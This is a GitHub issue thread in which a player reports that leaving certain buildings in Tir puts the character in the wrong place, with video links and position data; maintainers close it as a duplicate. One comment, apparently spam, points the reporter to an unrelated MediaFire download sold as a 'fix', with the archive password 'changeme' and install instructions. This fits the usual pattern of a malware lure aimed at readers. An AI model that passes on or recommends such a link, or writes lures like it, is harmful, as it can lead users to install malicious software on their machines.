### ISSUE TITLE
Exiting certain Tir buildings makes character appear in the wrong place

### ISSUE THREAD

**Issue by Dezzyx** [project-rubika/issues#809] opened 2024-08-27 04:32 UTC
Describe the bug

When you exit certain buildings in Tir you will appear in the wrong place. Videos below.

To Reproduce

1. Enter the specific Tir buildings
2. Exit
3. Notice how the character appears in an unusual place/position

Expected behavior

For the character to appear in the correct place outside the door when exiting.

"Screenshots"

**Water:**

https://github.com/user-attachments/assets/e61c2d41-c259-453f-beb4-cc8f5a89bca8

**Rails:**

https://github.com/user-attachments/assets/1d6bce72-a0f2-4984-92cc-07ab276312b7

**Notice how this one is working as intended:**

https://github.com/user-attachments/assets/6ca1d62d-0edb-4168-b7ed-fd6d6cac81a7

Playfield info:

- 421.2, 533.7, 8.0 (421.2 533.7 y 8.0 640)
- Pf Proxy: Model=51100:640 GS=0 SG=0 R=640, resource: 640
- zone: 270, area: "Tir City"
Server id: 1, character id: 50000:2052, time: 2024-08-27 04:24:43 (UTC)
Version: 00.6.3_EP1, map id: NOT FOUND, build: 52606.

**Comment by jia6214876** [comment] 2024-08-27 04:35
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by prkdrake** [comment] 2024-08-27 07:32
Looks like a duplicate of #380 to me

**Comment by RaggyLP** [comment] 2024-08-27 19:56
Agreed, this is linked to the above mentioned ticket. Closing as duplicate.

**Closed by RaggyLP** 2024-08-27 19:56 UTC
Labels: bug, needs-verification
